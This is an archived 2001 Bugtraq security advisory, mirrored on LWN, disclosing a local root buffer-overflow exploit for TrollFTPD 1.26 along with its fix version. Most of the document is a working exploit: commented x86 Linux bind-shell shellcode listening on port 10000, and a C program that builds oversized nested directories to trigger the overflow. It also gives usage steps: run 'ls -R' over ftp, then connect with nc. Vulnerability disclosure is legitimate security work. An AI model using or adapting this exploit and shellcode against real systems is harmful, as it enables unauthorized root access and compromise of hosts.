![[LWN Logo]](/images/lcorner.png) |
|
![[LWN.net]](/images/Included.png) |
From: zen-parse <zen-parse@gmx.net>
To: <bugtraq@securityfocus.com>
Subject: Local exploit for TrollFTPD-1.26
Date: Mon, 13 Aug 2001 15:22:22 +1200 (NZST)
Affects: TrollFTPD 1.26 (probably earlier)
Severity: local users can gain root access.
Fix: upgrade to TrollFTPD-1.27
Fix URL: ftp://ftp.trolltech.com/freebies/ftpd/troll-ftpd-1.27.tar.gz
Description:
An error in the handling of recursive directory listings can result in an
exploitable buffer overflow.
Exploit:
(offsets are for one machine. not guaranteed to work on any others.)
Run the program,
ftp localhost
<in ftp>
(your username)
(your password)
cd /tmp
ls -R
<out of ftp>
Connect to port 10000 with nc
Be nice.
-- zen-parse
--
-------------------------------------------------------------------------
The preceding information, unless directly posted by zen-parse@gmx.net to
an open forum is confidential information and not to be distributed
(without explicit permission being given by zen-parse@gmx.net). Legal
action may be taken to enforce this. If you are mum or dad, this probably
doesn't apply to you.
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax
"\x52" // push edx
"\x66\x68\x27\x10" // push word 4135
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe1" // mov ecx, esp
"\xb0\x10" // mov al, 16
"\x50" // push eax
"\x51" // push ecx
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\xb0\x66" // mov al, 102
"\xb3\x04" // mov bl, 4
"\xcd\x80" // int 80h
"\x50" // push eax
"\x50" // push eax
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xc3" // mov ebx, eax
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop lp
"\x51" // push ecx
"\x68\x55\x55\x55\x55" // push dword 68732f6eh
"\x68\x55\x55\x55\x55" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\x0b" // mov al, 11
"\xcd\x80"; // int 80h
main()
{
char dir[8000];
char nir[8000];
int z0=0,a0=0x080597f8;
int z1=0,a1=0xbff96450;
int g;
strcpy(dir,"/tmp/retroll/");
mkdir(dir,0777);
printf("%d\n",strlen(shellcode));
while(strlen(dir)<4040)
{
strcat(dir,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/");
mkdir(dir,0777);
}
// 4048 so far leaving 48 left.
if(chdir(dir)){perror("chdir");exit(1);}
printf("%d + ",strlen(dir));
sprintf(dir,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA/");
mkdir(dir,0777);
system("cp /bin/sh AAAAAAAAAAAAAAAAAAAAAAAAAAAAA/UUUUUUUU");
sprintf(nir,"%sAAAAAAAAAAAAAAAAAAAAAAAA",dir);
sprintf(dir,"%sGGGG=AAAAAAA%sAAAAAAAAAAAA%sCCCC%s",nir,&a0,&a1,shellcode);
printf("%d = ",strlen(dir));
mkdir(dir,0777);
}